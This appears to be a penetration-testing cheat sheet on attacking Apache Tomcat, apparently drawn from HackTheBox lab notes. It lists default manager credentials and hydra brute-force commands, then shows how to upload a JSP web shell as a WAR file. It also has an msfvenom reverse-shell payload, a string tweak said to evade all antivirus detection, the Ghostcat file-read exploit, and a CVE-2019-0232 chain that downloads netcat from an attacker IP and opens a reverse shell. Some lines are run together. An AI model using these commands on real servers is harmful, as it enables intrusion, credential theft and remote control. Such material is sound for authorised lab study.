Tomcat
General folder structure of a Tomcat installation
├── bin
├── conf
│ ├── catalina.policy
│ ├── catalina.properties
│ ├── context.xml
│ ├── tomcat-users.xml
│ ├── tomcat-users.xsd
│ └── web.xml
├── lib
├── logs
├── temp
├── webapps
│ ├── manager
│ │ ├── images
│ │ ├── META-INF
│ │ └── WEB-INF
| | └── web.xml
│ └── ROOT
│ └── WEB-INF
└── work
└── Catalina
└── localhostThe bin folder stores scripts and binaries needed to start and run a Tomcat server.
The conf folder stores various configuration files used by Tomcat.
The tomcat-users.xml file stores user credentials and their assigned roles.
The lib folder holds the various JAR files needed for the correct functioning of Tomcat. The logs and temp folders store temporary log files.
The webapps folder is the default webroot of Tomcat and hosts all the applications.
The work folder acts as a cache and is used to store data during runtime.
Each folder inside webapps is expected to have the following structure.
webapps/customapp
├── images
├── index.jsp
├── META-INF
│ └── context.xml
├── status.xsd
└── WEB-INF
├── jsp
| └── admin.jsp
└── web.xml
└── lib
| └── jdbc_drivers.jar
└── classes
└── AdminServlet.class
he most important file among these is WEB-INF/web.xml stores information about the routes used by the application and the classes handling these routes. Any vulnerability in these files can lead to total compromise of the website.
Discovery/Footprinting
Tomcat Version
#Get tomcat version
Intrusionz3r0@htb[/htb]$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat Default Credentials
The /manager/html directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:
admin:admin
tomcat:tomcat
admin:
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
Wordlist:
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
#Brute force attack
Intrusionz3r0@htb[/htb]$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f web01.inlanefreight.local http-get /manager/htmlBruteforce Script
https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce
Tomcat Manager - WAR File Upload
Intrusionz3r0@htb[/htb]$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
Intrusionz3r0@htb[/htb]$ zip -r backup.war cmd.jsp
#Upload the malicious file
Intrusionz3r0@htb[/htb]$ curl -s 'http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=ls'Using MSFVenom to create .war file. (The web shell as is only gets detected by 2/58 anti-virus vendors.)
Intrusionz3r0@htb[/htb]$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.warA simple change such as changing:
FileOutputStream(f);stream.write(m);o="Uploaded:
to:
FileOutputStream(f);stream.write(m);o="uPlOaDeD:
results in 0/58 security vendors flagging the cmd.jsp file as malicious at the time of writing.
CVE-2020-1938 : Ghostcat
All Tomcat versions before 9.0.31, 8.5.51, and 7.0.100 were found vulnerable.
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
Intrusionz3r0@htb[/htb]$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml Apache Tomcat: Important: Remote Code Execution on Windows (CVE-2019-0232)
Affected versions
9.0.0.M1 to 9.0.17
8.5.0 to 8.5.39
7.0.0 to 7.0.93
Intrusionz3r0@htb[/htb]$ fuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.47.188:8080//cgi/FUZZ.bat -t 300 -ic
Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&c%3a\Windows\System32\certutil.exe+-urlcache+-split+-f+http%3a//10.10.14.33/nc.exe'
Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&nc.exe+-e+cmd.exe+10.10.14.33+1234'Last updated